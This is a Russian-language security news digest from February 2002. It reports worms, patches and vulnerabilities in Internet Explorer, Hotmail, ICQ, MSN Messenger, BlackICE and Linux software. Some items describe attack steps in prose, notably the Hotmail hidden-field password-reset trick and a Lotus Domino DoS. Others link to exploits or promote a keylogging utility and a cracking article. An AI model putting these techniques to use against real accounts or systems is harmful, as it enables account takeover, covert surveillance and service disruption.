"Лаборатория Касперского" объявляет об обнаружении и создании антивируса против нового червя "CoolNow", проникающего на компьютеры при посещении определенных веб-сайтов и распространяющегося при помощи популярного интернет-пейджера MSN Messenger. Ранее сегодня уже сообщалось о предупреждении со стороны Microsoft по поводу появлении опасного вируса, который они называют Warhol. Подробности: http://www.compulenta.ru/news/2002/2/14/25307/ Заплатку для Internet Explorer можно скачать http://www.microsoft.com/windows/ie/downloads/critical/q316059/default.asp
14/02/2002 Выпущена очередная заплатка для Windows XP.
Компания Microsoft выпустила очередное обновление для операционных систем семейства Windows XP. Данная заплатка решает проблемы с некоторыми PCI-устройствами с поддержкой расширенного управления питанием. В результате недоработок в системе, после возвращения компьютера из режима StandBy, некоторые устройства становятся недоступными. Подробности: http://www.compulenta.ru/news/2002/2/14/25587/
13/02/2002 Уязвимость веб-интерфейса ICQ.
Обнаружена серьезная проблема в веб-интерфейсе ICQ. Суть уязвимости состоит в возможности доступа к информации, хранящейся в ICQ White Pages. Информацию пользователей некоторых номеров ICQ можно произвольно менять, а также от имени этих пользователей можно отсылать SMS-сообщения. Несанкционированный доступ к ICQ White Pages осуществляется через поддельную форму доступа к личной информации, включающую поле "номер" и "пароль". При введении в поле "пароль" более 8 знаков информация пользователей некоторых номеров становится полностью доступной для любого искажения. Источники: http://icq.vsochi.com http://www.bezpeka.com/news/index.html#12-02-02
13/02/2002 ФБР занимается мониторингом уязвимостей интернета.
Федеральное бюро расследований США объявило о том, что его агенты занимаются мониторингом "потенциальных брешей" в компьютерных сетях, из-за которых определенные зоны интернета оказываются уязвимы. Подробности - http://www.compulenta.ru/news/2002/2/13/25552/
13/02/2002 Новое в разделе проектов: Spy Clock v1.08.
Утилита, которая позволит вам всегда точно определить размер свободной оперативной памяти и состояние подключения к сети через модем. Программа поддерживает функцию шпиона клавиатуры с помощью которой можно отловить все нажатые клавиши за время работы на компьютере. Программа имеет гибкий интерфейс, и вы можете настроить ее под себя. Разумеется вы всегда сможете узнать время и текущую дату. Скачать можно здесь: http://www.uinc.ru/scripts/load.cgi?files/rook/spycl_en.zip
13/02/2002 Интервью с Andrew Morton.
kerneltrap.com снова радует нас новыми интервью с разработчиками ядра Linux. На этот раз их "жертвой" стал известный программист Andrew Morton. Интервью - http://kerneltrap.org/article.php?sid=531
13/02/2002 Mandrake 8.2.
Следующая (вторая) бета ожидаемого всеми Mandrake 8.2 вышла и доступна на сайте Mandrake Linux. В первой бете было найдено очень немного серьезных проблем, поэтому команда разработчиков сейчас работает над улучшением распознавания "железа", процедуры установки и поддержания пакетов ПО в современном состоянии. Источник - http://www.linuxcenter.ru:8081/news/#885
13/02/2002 Новый мировой рекорд Linux.
Компании IBM и Turbolinux Inc объявили, что комбинация базы данных IBM DB2 и серверного программного обеспечения Turbolinux 7 Server теперь обладает мировым рекордом производительности в стандартном тесте TPC-H (100GB). Источник - http://www.linuxcenter.ru:8081/news/#887
13/02/2002 Microsoft обратила внимание на проблемы безопасности своих продуктов.
По сообщениям ряда американских изданий, основатель компании Билл Гейтс разослал 7000 сотрудникам Microsoft письмо с приказом сконцентрировать все усилия на поиске ошибок и ликвидации прорех в безопасности операционных систем Windows 2000 и Windows XP. Такое решение было принято после обнаружения в нескольких продуктах Microsoft, включая браузер Internet Explorer, опасных уязвимых мест, позволяющих злоумышленнику захватить управление компьютером. Подробности - http://www.compulenta.ru/news/2002/2/13/25502/
13/02/2002 Ошибки в SNMP.
Координационный центр известной организации CERT, специализирующейся на мониторинге проблем компьютерной безопасности, опубликовал информацию о весьма серьезных ошибках, обнаруженных в реализации протокола SNMP (Simple Network Management Protocol). Этот протокол является одним из основных в интернете и используется для получения информации о состоянии и производительности самого разного сетевого оборудования: маршрутизаторов, коммутаторов, принтеров и т.д. Подробности - http://www.compulenta.ru/news/2002/2/12/25498/
12/02/2002 Microsoft выпустила патч к трем последним версиям Internet Explorer.
Компания Microsoft выпустила патч, закрывающий шесть уязвимостей в трех последних версиях Internet Explorer. Три из этих уязвимостей считаются средними, зато другие три - критическими. Самая серьезная из них теоретически позволяет хакеру запустить на компьютере жертвы любую программу, причем для этого злоумышленнику потребуется лишь заманить жертву на определенный веб-сайт или прислать ему такую html-страницу по почте. Причем, как стало известно, ее отыскали российские специалисты. Источник - http://www.compulenta.ru/news/2002/2/12/25484/
12/02/2002 Червь Worm.Klez вылезет 13 февраля .
По сообщению "Лаборатории Касперского", 13-е числа четных месяцев - то есть в том числе и завтрашний день 13 февраля - время активизации интернет-червя Worm.Klez. В этот день червь заполняет файлы на компьютере случайным содержимым. Такие файлы не подлежат восстановлению и должны быть заменены с резервных копий. То же самое касается и модификаций данного червя. Напомним, что первая версия интернет-червя Klez появилась в октябре прошлого года. На сегодняшний день "Лаборатории Касперского" известно пять его модификаций. I-Worm.Klez распространяется через Интернет в виде файлов, прикрепленных к зараженным письмам. Червь является приложением Windows (exe-файл), имеет размер от 57K до 65K (в зависимости от версии), написан на Microsoft Visual C++. Для запуска из зараженных сообщений червь использует брешь в защите Internet Explorer (IFRAME-брешь), что может привести к автоматической активизации червя при обычном просмотре сообщения. Помимо распространения по сети и в письмах электронной почты, червь также создает во временном каталоге Windows exe-файл со случайным именем, начинающимся на букву "K" (например, KB180.exe), записывает в этот файл код вируса "Win32.Klez" и запускает его на выполнение, что приводит к заражению большинства Win32 PE EXE файлов на дисках компьютера. Подробности - http://www.viruslist.com/index.html?tnews=1007&id=79978
12/02/2002 Ещё одна программа для построения "цепочки" прокси.
В нашем форуме часто спрашивают о том, как построить цепочку прокси-серверов. В принципе, одна из ссылок есть в нашем FAQ. Для заинтересованных предлагается ещё одна программа socks_chain. Cкачать можно отсюда - ftp://ftp.fi.upm.es/pub/mirrors/win/win95/netutil/sockschain_setup.exe
12/02/2002 В Hotmail обнаружена очень серьезная уязвимость, позволяющая хакерам менять пароли пользователей.
Специалисты по безопасности обнаружили очередную - и весьма серьезную - уязвимость в службе Hotmail. Благодаря этой дыре, о которой в Microsoft, кстати, сообщил небезызвестный "специалист по компьютерной безопасности" АдрианЛамо, злоумышленник может легко поменять под себя пароль пользователя. В один прекрасный день тот может обнаружить, что не имеет доступа к собственному почтовому ящику. Беда в том, что пароль в Hotmail это одновременно и пароль для входа в другие сервисы Microsoft, .NET, например. А следовательно, хакер, взломавший чужой пароль в Hotmail, может получить значительно больше, чем бесплатный почтовый ящик, который вроде бы легче завести самому. Как правило, пользователю, забывшему свой пароль, предлагается заполнить форму, в которой он повторно указывает адрес электронной почты, штат или государство, в котором он проживает, и почтовый индекс. Если ответы совпадают с тем, что он вводил при регистрации нового почтового ящика, то ему предлагается ответить на какой-нибудь "секретный вопрос" (например, как в mail.ru) вроде "Как зовут мою собаку?", или какой-то другой. Как выяснилось, любой человек, который в состоянии вызвать текст html-источника страницы (Internet Explorer это называется "в виде HTML"), увидит там "скрытое" поле. Если его, как сообщает Newsbytes, заполнить нужным логином, записать html-текст этой формы в виде отдельного html-файла и запустить через браузер, то на экран выводится тот самый "секретный вопрос". Если он слишком простой и ответ на него достаточно легко отгадать, хакер может сменить пароль под себя. Подробности - http://www.compulenta.ru/news/2002/2/12/25466/
12/02/2002 Обнаружена уязвимость в брандмауэре Black Ice.
Разработчик решений в области сетевой безопасности, компания ISS предупреждает пользователей о наличии уязвимости в нескольких программах для сетевой защиты. Некоторые версии брандмауэра Black Icе имеют серьезную прореху в безопасности, позволяющую удаленно нарушить работу сетевого экрана. Уязвимость, присутствующая и в других продуктах компании, также позволяет выполнять программный код на удаленной системе, а также проводить DoS-атаки. Проблема актуальная для пользователей персональных версий ПО, программы сетевой защиты в корпоративном исполнении не подвержены данной уязвимости. В настоящий момент компания ISS работает над серией патчей для различных программ. Уязвимости подвержены: BlackICE Defender 2.9, BlackICE Defender for Server 2.9, BlackICE Agent for Workstation 3.0 and 3.1, BlackICE Agent for Server 3.0 and 3.1, RealSecure Server Sensor 6.0.1 and 6.5 Подробное описание и патч для Black Ice - http://www.iss.net/support/consumer/BI_downloads.php
11/02/2002 Ядро 2.5 будет полностью вытесняемым.
Следуя сообщению на http://www.linuxdevices.com/, в официальное ядро Linux вошел доступный ранее патч, делающий код ядра Linux полностью вытесняемым. Это значительно сокращает время отклика интерактивных приложений на сильно загруженных системах. Источник:http://www.linux.org.ru/jump-message.jsp?msgid=157605&lastmod=1013439270000
11/02/2002 Русская Mozilla.
Валентина Ванеева из консорциума Сибкон www.sibcon.ru подготовила русскую локализацию для Mozilla-0.9.8. Непереведенными остались пока справочная система и отладчик JS. Русско-английскую Mozilla собрала для Linux и Win32 команда ALT Linux. Сборки доступны с сайта проекта mozilla.ru, ftp-сайта ALT Linux, скоро появятся на ftp.mozilla.org Более подробно - http://www.mozilla.ru
11/02/2002 Компания LavaSoft объявила о наборе добровольцев для совершенствования средств борьбы со шпионскими модулями в программах.
Немецкая компания LavaSoft, распространила в специализированных интернет-конференциях объявление о поиске добровольцев, которые могли бы бесплатно участвовать в исследовательских разработках, тестировании программ и поддержке пользователей. LavaSoft известна благодаря утилите Ad-Aware, предназначенной для удаления из системы самостоятельно устанавливающихся "шпионских" и рекламных модулей (spyware). Такие модули часто входят в состав бесплатных, а иногда и shareware программ, и используются для сбора информации о пользователе, в том числе адресов электронной почты, статистики посещения сайтов и т.д. Сам пользователь может даже и не знать о ведущейся за ним слежке. Желающим помочь LavaSoft в борьбе с spyware предлагается написать электронное письмо по одному из адресов: research@lavasoft.de (разработки), beta@lavasoft.de (тестирование), products@lavasoft.de (поддержка пользователей). Подробности - http://www.compulenta.ru/news/2002/2/8/25371/
11/02/2002 Список уязвимостей в патченной версии IE6.0.
Thor Larholm и Tom Gilder выложили на своей странице список всех уязвимостей, присутствующих на настоящий момент в полностью патченной версии 6.0 броузера IE. Как пишут сами авторы, этот список был публично выложен с целью оказать давление на фирму Microsoft, чтобы она быстрее закрывала "дыры" в своих продуктах. Указанные уязвимости присутствуют в броузере последней версии со всеми установленными "заплатками". Unpatched IE6 security holes - http://jscript.dk/unpatched/
10/02/2002 Сниффинг клавиатуры на основе LKM.
Новая статья на www.packetstormsecurity.nl, описывающая основные принципы и технику, используемые при записи клавиатурной активности в среде Linux. Статья - http://packetstormsecurity.nl/UNIX/security/kernel.keylogger.txt
10/02/2002 Бесплатная утилита, защищающая от вируса Klez.
В связи с многочисленными сообщениями о заражении последней модификацией интернет-червя Klez, антивирусная компания "Лаборатория Касперского" разработала бесплатную утилиту для обнаружения и удаления этого червя. Загрузить утилиту можно с сайта компании. Источник - http://www.bezpeka.com/news/index.html#08-02-06
10/02/2002 Ошибка в реализации 'uucp' дистрибутива Debian.
Zenic Parsec обнаружил уязвимость в Taylor UUCP 1.06.1, которая позволяет локальному пользователю производить копирование любой информации в каталоги, доступные для записи пользователю uucp. Подробности - http://www.newsforge.com/article.pl?sid=02/02/08/2254214&mode=nocomment
10/02/2002 Глава Sun наглядно продемонстрировал свою любовь к Linux.
Как уже сообщалось, компания Sun Microsystems объявила о крупной программе поддержки Linux. Свое пристрастие к Linux глава Sun Скотт Макнили выразил более чем наглядно: на конференции, где было объявлено о начале программы, исполнительный директор Sun расхаживал по сцене в костюме пингвина Тукса. Пока аналитики хохотали, вконец взмокший МакНили сказал: "Если я скажу, что мы собираемся истратить миллиард долларов на Linux, можно мне будет снять это с себя?" Прочитать - http://www.compulenta.ru/news/2002/2/8/25337/
10/02/2002 Переполнение буфера в groff.
По данным www.linux-mandrake.com, в препроцессоре groff была обнаружена уязвимость, которая может быть использована для получения привилегий пользователя 'lp'. Подробности - http://www.newsforge.com/article.pl?sid=02/02/08/2238255&mode=nocomment
9/02/2002 XPAntiSpy - повышение уровня безопасности вашей Windows XP системы.
Что это за программа? Она предназначена для повышения вашей приватности в этой системе, удаляя все скрытые и труднодоступные "phone-home"(сообщающие-"стучащие") качества - это те, которе передают информацию с вашего компьютера сайту Майкрософт. Скачать программу можно здесь: http://www.xp-antispy.de/XPAntiSpy3-English.zip
9/02/2002 Microsoft готовит новую заплатку к MSN Messenger.
Microsoft заканчивает работу над патчем к интернет-пейджеру MSN Messenger, в котором была обнаружена дыра, позволяющая получать доступ к "записной книжке" этой программы. Проблема состоит в том, что список контактов MSN Messenger можно получить при помощи размещенного на веб-странице Java-скрипта. Изначально эту возможность планировала использовать сама Microsoft для автоматической настройки веб-сайтов под конкретного пользователя, для чего сайт должен предварительно запросить необходимую информацию у MSN Messenger. Источник - http://www.compulenta.ru/news/2002/2/9/25376/
9/02/2002 "ДиалогНаука" предсказывает большое будущее вирусам, передающимся через заражённые диски.
Компания "Сонгор Телеком", поставщик устройств Maximus USB Drive в России и странах СНГ, и производитель антивирусных программ "ДиалогНаука" начинают совместную акцию. Продаваемые на территории России устройства Maximus будут комплектоваться трехмесячной лицензией на Антивирус Doctor Web. По истечении срока действия лицензии, пользователи могут продлить подписку и приобрести годовой абонемент на Антивирус Doctor Web с 30% скидкой. Подробности - http://www.compulenta.ru/news/2002/2/9/25373/
9/02/2002 Новое в разделе Our Projects: uinC ScreenSaver v1.0.
Скринсейвер посвящается поклонникам нашего сайта, то бишь www.uinc.ru. Отличный графический эффект! Вам не нравится этот хранитель экрана? Тогда убейтесь, упейтесь, удавитесь, но не жалуйтесь! К скринсейверу прилагаются исходники. Скачать (95кб): http://www.uinc.ru/scripts/load.cgi?files/dr.golova/uinC_Scr.exe
9/02/2002 Борьба Microsoft с пиратами привела к появлению дыр в защите Office v.X.
Компания Microsoft сообщила об уязвимости, обнаруженной в офисном пакете Microsoft Office v.X для операционной системы Mac OS. В данной версии офисного ПО применен механизм борьбы с установкой одной копии программы на несколько компьютеров. В случае совместно работы ПК в локальной сети, программа сравнивает собственный уникальный серийный номер с аналогичными номерами ПО на соседних компьютерах, и, в случае совпадения номера, происходит закрытие программы. Уязвимость была обнаружена именно в механизме проверки идентификационного номера в MS Office v.X. Специальным образом составленный ответ на запрос серийного номера может привести к тому, что офисный пакет "вылетает" без сохранения документов. Подробности - http://www.compulenta.ru/news/2002/2/7/25295/
9/02/2002 Выход Zeta Linux.
Thomas Capricelli вчера в рассылке linux-kernel mailing list сообщил о релизе нового Linux "дистрибутива" Zeta Linux 0.1 под "виртуальную" платформу. Подробности - http://kerneltrap.com/ Сайт проекта - http://orzel.freehackers.org/zeta/
9/02/2002 Уязвимость в сервере Microsoft Exchange 2000.
Компания Microsoft сообщила об обнаружении уязвимости в почтовом сервере Microsoft Exchange 2000. Уязвимость выявлена в службе System Attendant, позволяющей удаленное администрирование сервера Exchange. Для того, чтобы администратор имел возможность удаленно работать с сервером, служба System Attendant производит изменения в реестре системы. Как сообщают в Microsoft, ошибка в процессе изменения реестра операционной системы может привести к тому, что обычный пользователь почтового сервера может удаленно получить права администратора Exchange. Подробности - http://www.compulenta.ru/news/2002/2/8/25334/
9/02/2002 Уязвимость в Telnet-сервере Windows 2000.
Компания Microsoft сообщила об уязвимости, найденной в telnet-сервере, использующемся в ОС Windows 2000 и программе Interix 2.2. Протокол telnet предоставляет пользователям возможности удаленного подключения к системе. Как сообщают в компании Microsoft, в версиях telnet-сервера, включенных в Windows 2000 и Interix, существует уязвимость. Подробности - http://www.compulenta.ru/news/2002/2/8/25333/
8/02/2002 Данные о клиентах компании Comcast оказались доступны всем.
Эксперт по безопасности Рассел Хэндорф сообщает о том, что база данных с тысячами записей о клиентах компании Comcast доступна для неавторизованного доступа любому посетителю сайта компании. Для доступа к личным данным оказалось достаточно ввести логин и пароль "test", после чего любой может получить подробную информацию о корпоративных клиентах компании, обеспечивающей высокоскоростной доступ к интернету. Подробности - http://www.compulenta.ru/news/2002/2/8/25327/
8/02/2002 Переполнение буфера в telnet дистрибутива Linux Red Hat.
Представители LinuxSecurity.com сообщили о том, что telnet клиент и сервер, входящие в поставку дистрибутива Red Hat (версии 5.2, 6.2, 7.0 and 7.1) содержат уязвимость, позволяющую локальному пользователю получить привилегии суперпользователя (root). Патчи уже доступны для скачивания. Подробности - http://www.linuxsecurity.com/advisories/redhat_advisory-1881.html
8/02/2002 Уязвимость в wmtv для Linux.
Nicolas Boullis сообщил о найденной им уязвимости в wmtv (video4linux TV плеер для windowmaker, входящий в поставку Debian GNU/Linux 2.2). Подробности - http://www.linuxsecurity.com/advisories/debian_advisory-1880.html
8/02/2002 Выход Linux 2.5.4-pre3.
Новый релиз ключает множество исправлений для работы с sysvfs, minixfs, ncpfs, smbfs, procfs. Скачать - http://www.ru.kernel.org/pub/linux/kernel/v2.5/testing/patch-2.5.4-pre3.gz
7/02/2002 Уязвимость в procfs FreeBSD.
По данным www.freebsd.org, между вызовами fstatfs() может возникнуть ситуация, именуемая "race condition", что может привести к неправильной обработке дискриптора файла и дает непривелирегованному пользователю возможность вызвать "kernel panic". Источник - http://www.newsforge.com/article.pl?sid=02/02/06/2241212&mode=nocomment
7/02/2002 В "неуязвимых" программных продуктах Oracle обнаружена куча дыр.
Британская компания NGSSoftware опубликовала данные об обнаруженных ее сотрудниками дырах в СУБД Oracle, которые называются в рекламе не иначе как "неуязвимые" (unbreakable). Тем не менее, специалистам NGSSoftware удалось обнаружить, по меньшей мере, три уязвимости, используя которые, хакер может нанести серьезный ущерб компании, использующей базы данных Oracle. Подробности - http://www.compulenta.ru/news/2002/2/7/25261/
7/02/2002 Первые тестеры Lindows делятся впечатлениями от новой ОС.
В конце января появилась первая предварительная версия Lindows, которую получили избранные тестеры из числа зарегистрированных пользователей сайта компании, а на этой неделе сайт ZDNet UK опубликовал их впечатления от новой ОС. В первую очередь, тестеры отмечают крайне упрощенную процедуру установки Lindows. Она может осуществляться из-под Windows 98 или путем загрузки системы с компакт-диска. При этом большинство опций программа установки выбирает без участия пользователя, а весь процесс установки занимает менее 10 минут. Все программы, ранее установленные в среде Windows остаются в соответствующих меню новой ОС, хотя работают далеко не все из них. Подробности - http://www.compulenta.ru/news/2002/2/7/25257/
7/02/2002 У нас новая статья: Взлом программ, защищенных с помощью криптоалгоритма Blowfish..
В этой статье рассказывается, как преодолевать защиту, построенную на использовании криптоалгоритма Blowfish. Статья предназначена, как для программистов, так и для людей, изучающих защиты чужих программ. Ознакомиться: http://www.uinc.ru/articles/30/index.shtml
7/02/2002 DoS-уязвимость серверов Lotus Domino.
В серверах Lotus Domino обнаружена уязвимость, позволяющая организовывать DoS-атаки.Удаленный пользователь может периодически запрашивать некоторое устройство (например, CON, AUX, PRN, NUL) из любого cgi-bin приложения с расширением, обрабатываемым веб-сервером. Веб-сервер, в свою очередь, будет передавать запрос программе nhttpcgi.exe, запуская для каждого запроса отдельный процесс. Когда лимит по количеству процессов будет достигнут (в Domino он составляет 400 одновременно запущенных процессов), сервер прекратит обрабатывать остальные внешние запросы. Уязвимы версии: Lotus Domino 5.0.9 и более ранние. Источник - http://www.bezpeka.com/news/index.html#06-02-02
6/02/2002 Дыры в Morpheus не оказалось.
В воскресенье, 3 февраля, появилась информация о том, что в системе обмена музыкальными файлами Morpheus обнаружена дыра, которая позволяет кому угодно просматривать содержимое жестких дисков клиентов сети. Однако сайт BBC, который распространил информацию о дыре, ошибся. Журналисты из NewsBytes провели собственное расследование и выяснили, что никакой дыры не было. В процессе инсталяции Morpheus создает на жестком диске директорию, в которой хранятся музыкальные файлы для обмена с другими пользователями. По идее, только она одна и может быть доступна снаружи. Однако многие пользователи делали доступным для всех весь свой жеский диск. Источник - http://www.lenta.ru/
6/02/2002 ISS выпустил документ по уязвимости в Black ICE Defender.
ISS утверждает в BUGTRAQ, что получили сигнал об уязвимости в Black ICE Defender. Пока готовится патч, предоставлен документ по этой уязвимости. Ссылка на документ - http://xforce.iss.net/alerts/advise109.php
6/02/2002 Larry Wall получает "Perl Development Grant".
Представители Perl Foundation заявили о присуждении гранта Larry, создателю популярнейшего скрипт-языка Перл. После 1998-ого года, когда Wall получил премию журнала PCMagazine (тогда Перл победил в конкурсе разработку Microsoft Visual Studio), это первая заметная премия, полученная известнейшим программистом. Подробности - http://use.perl.org/article.pl?sid=02/02/05/1722245&mode=thread&tid=1
6/02/2002 Выход Linux-2.5.4-pre1.
Линус Торвальдс объявил о выходе первого "pre" релиза ядра 2.4.5. Данная версия включает в себя более 50-ти исправлений, направленных на улучшение работы с ISDN, NFS, USB, reiserfs. Подробности - http://www.linuxtoday.org/news_story.php3?ltsn=2002-02-06-006-20-NW-KN-DV Скачать - http://www.kernel.org/pub/linux/kernel/v2.5/testing/patch-2.5.4-pre1.bz2
6/02/2002 Финансы без пpоблем (ТМ): веpсии для Linux и FreeBSD.
Фиpма Хакеpс Дизайн выпустила новые веpсии для Linux и FreeBSD своей платфоpмы для автоматизации учета и упpавления. Эти веpсии pаспpостpаняются бесплатно. Функционально они эквивалентны коммеpческим веpсиям для Windows. Однопользовательская веpсия ФБП ultraLC для Linux - http://hdru.com/wwwboard/messages/4143.htm ФБП: Сеpвеp 3.23 для Linux - http://hdru.com/wwwboard/messages/3829.htm ФБП: Сеpвеp 3.23 для FreeBSD - http://hdru.com/wwwboard/messages/3829.htm
6/02/2002 Вышел новый релиз Mozilla-0.9.8.
Улучшенна работа с адресной книгой, поддержка MNG/JNG, переключение тем на лету и многое другое. Подробности - http://www.mozilla.org/releases/mozilla0.9.8/
6/02/2002 DARPA вплотную занялось безопасностью Linux.
Агентство DARPA (Defense Advanced Research Projects Agency), прославившееся организацией правительственной сети ARPANet, предвестницы Интернета, во вторник объявило о создании специализированного интернет-ресурса, который станет местом независимого аудита безопасности ПО с открытым кодом. Как сообщает CNet, веб-портал Sardonix Audit Portal, тестовая версия которого уже запущена, станет тем местом, где программисты будут обмениваться информацией о дырах, найденных в открытом ПО друг друга. Как заявил Криспин Коуэн, один из основателей Sardonix, проверка программных продуктов на предмет безопасности осуществляется в намного меньших масштабах, чем думают пользователи. Криспин Коуэн в настоящее время работает главным научным консультантом в компании WireX Communications, занимающейся разработкой систем безопасности под Linux. "Ядро ОС Linux, возможно, действительно довольно хорошо проверено на наличие уязвимых мест, а вот с аудитом безопасности браузера Mozilla дела, вероятно, обстоят уже не так хорошо. Однако все это - лишь догадки, - заявляет Коуэн, - и нам предстоит еще оценить, так ли это на самом деле". Сообщество open-source уже пыталось организовать нечто подобное, однако эта инициатива практически ни к чему не привела. В 1998 году разработчики Linux запустили проект Linux Security Audit Project, предназначенный для выявления всех дыр и багов ОС Linux. Однако почтовая рассылка очень быстро превратилась в простой дискуссионный клуб, в котором обсуждались общие проблемы безопасности Linux, а просмотр и проверка существующих строк кода так толком и не были начаты. Ссылка на проект Sardonix - http://www.sardonix.org/
6/02/2002 Федеральные финансы США - легкая добыча для хакеров .
Главная счетная палата Конгресса США (GAO) оповестила широкую общественность о том, что компьютеры Министерства финансов, оперирующие триллионами долларов налогов и социальных выплат, остаются легко уязвимыми для хакерских атак. Доклад этого парламентского контролирующего органа был представлен в понедельник, сообщает Reuters. О слабой защищенности компьютеров Службы управления финансами Счетная палата предупреждала правительство еще в 1997 году, но, как выяснилось, безопасность осталась на низком уровне. В докладе говорится, что миллиарды долларов платежей и сборов подвержены существенному риску пропаж и махинаций, важные данные могут быть похищены, а компьютерные транзакции нарушены. Финансовое ведомство ежегодно выплачивает свыше 1,9 триллиона долларов на социальное обеспечение, поддержку ветеранов, налоговые премии, зарплату федеральным служащим. Через компьютеры этой службы также проходят два триллиона долларов федеральных сборов - налогов, штрафов и пошлин. Счетная палата обозначила наиболее слабые места в защите компьютерной системы Министерства финансов: слабая система паролей и ключей доступа, недостаточные и устаревшие средства администрирования системы, отсутствие удовлетворительной программы безопасности, охватывающей всю сеть. Источник - http://www.gao.gov/new.items/d02317.pdf
6/02/2002 Злобные SMS из Китая делают харакири телефонам Siemens.
Специалисты компании Siemens анализируют ситуацию с ошибкой в системе безопасности телефонов, которая позволяет хакерам "завешивать" телефоны, отправляя неправильно сформированные SMS на китайском языке. Брешь существует в телефонах Siemens 3568i и младших моделях. Согласно данным китайских аналитиков из xfocus, SMS с определенной последовательностью символов может выключить телефон и сделать невозможным удаление сообщения без скачивания ПО, которое не входит в стандартный пакет поставки телефона. Уязвимость может быть использована для проведения DoS-атак. Сотрудники xfocus сообщили об обнаружении бреши в прошлом месяце, но факт ее существования явился новостью для отделения Siemens в Соединенном Королевстве, куда сотрудники The Register обратились на прошлой неделе. В декабре аналогичная ситуация сложилась с телефонами Nokia, когда SMS с неправильно сформированным заголовком блока пользовательских данных вызывали "зависание" телефона. Более подробно - http://www.xfocus.org/adv.php?id=3
6/02/2002 Неугомонному хакеру предстоит провести 21 месяц в тюрьме.
Решением суда 20-летний хакер Джейсон Аллен Дикман будет помещен в тюрьму на срок в 21 месяц и будет обязан возместить убытки пострадавших в размере 88 тысяч долларов. Дикман был арестован в ноябре 2000 года за взлом компьютеров, принадлежащих лабораториям NASA в университетах Пасадены и Стэнфорда. При этом он украл пароли и номера кредитных карт пользователей компьютеров нескольких университетов. Однако арест не остановил талантливого взломщика. По заявлению обвинителей, Дикман, будучи освобожден под залог, взламывал компьютерную систему Государственного университета штата Орегон около тридцати раз. В сентябре 2001 года Джейсон Аллен Дикман был снова арестован, на сей раз за взлом базы данных провайдера Сан-Хосе, кражу паролей и номеров кредитных карт. Подробности - http://www.compulenta.ru/news/2002/2/5/25190/
5/02/2002 Драйверы HP стали "free".
Компания Hewlett Packard изменила лицензию на драйверы для своих HP DeskJet принтеров под Linux. Теперь (начиная с версии 1.0.1) из лицензии убрано словосочетание "HP Product Only", и драйверы получают новый статус - "free". Источник - http://www.linuxcenter.ru:8081/news/#870
5/02/2002 Уязвимость в Black ICE Defender.
В программе для защиты персонального компьютера Black ICE Defender (2.9.caq and 2.9.cap), запущенного в ОС Win2K обнаружена уязвимость, которая позволяет при соотв. образом сформированном ICMP эхо-запросе (команда ping) "свалить" машину в знаменитый "Blue Screen of Death" или заставить ОС перезагрузиться. Длина пакета должна быть около 10КБ. Подобный пакет можно сформировать при помощи программ Divine Intervention 2 & 3, Sisoft Sandra Network. Источник - http://www.securityfocus.com
5/02/2002 MSN Messenger позволяет Вэб-серверам получать конфиденциальные данные.
Как сообщает в BUGTRAQ Ричард Бартон, MSN Messenger (и Windows Messenger на XP) может быть использован Вэб-серверами для получения данных о пользователе, который посещает эти сервера. К числу этих данных относятся: имя пользователя (display name), список лиц, с которыми контактирует пользователь и адрес его электронной почты. Уязвимости подвержены следующие продукты: MSN Messenger 4.6.0073 (latest at 02/02/2002) на Windows 2000 с IE 6, Windows Messenger 4.6.0073 (latest at 02/02/2002) на Windows XP сIE 6, и, возможно, другие версии и платформы. Сайты и домены, прописанные в подключах "Suffix0", "Suffix1" и т.д. ключа реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MessengerService\Policies\Suffixes имеют полный доступ ко всей информации MSN Messenger. Кроме того, домены microsoft.com, hotmail.com и hotmail.msn.com "жёстко" прошиты в самой программе! Таким образом, фирма Microsoft изначально имеет доступ к вышеназванной частной информации при посещении их сайтов пользователями. В подключи "Suffix0", "Suffix1" и т.д. информация может быть записана различными программами-как троянскими, так и shareware. В качестве защиты автор рекомендует следующие меры: 1. Не иметь в display name конфиденциальной информации, 2. Периодически проверять вышеназванные ключи реестра, 3. При посещении сайтов Microsoft закрывать MSN Messenger. Подробное описание и пример эксплоита - http://raburton.members.easyspace.com/msn/
5/02/2002 Microsoft приостанавливает работу над всеми новыми программами.
Как выяснилось, заявление Билла Гейтса об изменениях в курсе Microsoft не были пустыми словами. Второго февраля на саммите по конфиденциальности и информационной безопасности представитель Microsoft Ричард Перселл объявил, что Microsoft приостанавливает работу над новыми продуктами. "Начиная с сегодняшнего дня, мы ровно месяц не будем писать новые программы", - сказал он. Вместо этого программисты компании займутся устранением недочетов в прежних разработках. Источник - http://www.sec.ru/newsmgr.cfm?nid=3963
5/02/2002 Уязвимость в kicq 2.0.0b1.
Популярная версия ICQ клиента под Linux содержит уязвимость, позволяющую провести DoS атаку. Для этого просто необходимо инициировать telnet сессию с удаленной машиной и произвести посылку случайного набора символов. Подробности - http://www.securityfocus.com/bid/4018
5/02/2002 Linux менее безопасен, нежели Windows?.
По данным SecurityFocus.com , количество найденных в Linux системах уязвимостей за прошлый год превысило количество уязвимостей, обнаруженных в Windows. Согласно статистике, Мandrake Linux 7.2 "наградил" своих пользователей 33 багами, Red Hat 7.0 отличился 28 раз, Mandrake 7.1 - 27 и Debian 2.2 - 26. Подробности - http://www.vnunet.com/News/1128907
5/02/2002 Серьезная уязвимость в приложении Morpheus .
Служба новостей BBC News Online сообщает об обнаружении группой экспертов в области сетевой безопасности опасной системной уязвимости в приложении Morpheus, используемом в качестве клиентской программы популярного Р2Р-сервиса MusicCity. Уязвимость позволяет получить удаленный доступ к любой информации, имеющейся на жестком диске компьютера с установленным Morpheus. Официальная реакция MusicCity на информацию ВВС, равно как и данные о том, каким образом будет ликвидирована столь серьезная программная уязвимость, до настоящего времени неизвестны. По материалам: http://www.bezpeka.com
5/02/2002 В IRC-клиенте mIRC обнаружена уязвимость.
В популярном IRC-клиенте mIRC обнаружена весьма серьезная дыра, позволяющая злоумышленнику запускать на компьютере жертвы практически любой код. Уязвимость была обнаружена программистом из Ирландии Джеймсом Мартином еще в декабре, однако вследствие серьезности проблемы он не стал широко разглашать факт наличия дыры. Вместо этого Мартин связался с автором mIRC Халедом Мардам-Беем, который исправил ошибку в ходе работы над mIRC 6.0. Подробности - http://www.compulenta.ru/news/2002/2/4/25152/ Полное описание эксплоита - http://www.uuuppz.com/research/adv-001-mirc.htm
4/02/2002 Уязвимость MRTG.
Обнаружена уязвимость в Multi Router Traffic Grapher (MRTG) - программе, используемой для мониторинга загрузки сети. При реализации данной уязвимости удаленный пользователь может просматривать часть содержимого файлов (первую строчку) на сервере. Уязвимость заключается в неправильной обработке данных от пользователя. Источник - http://www.bezpeka.com/news/index.html#04-02-01
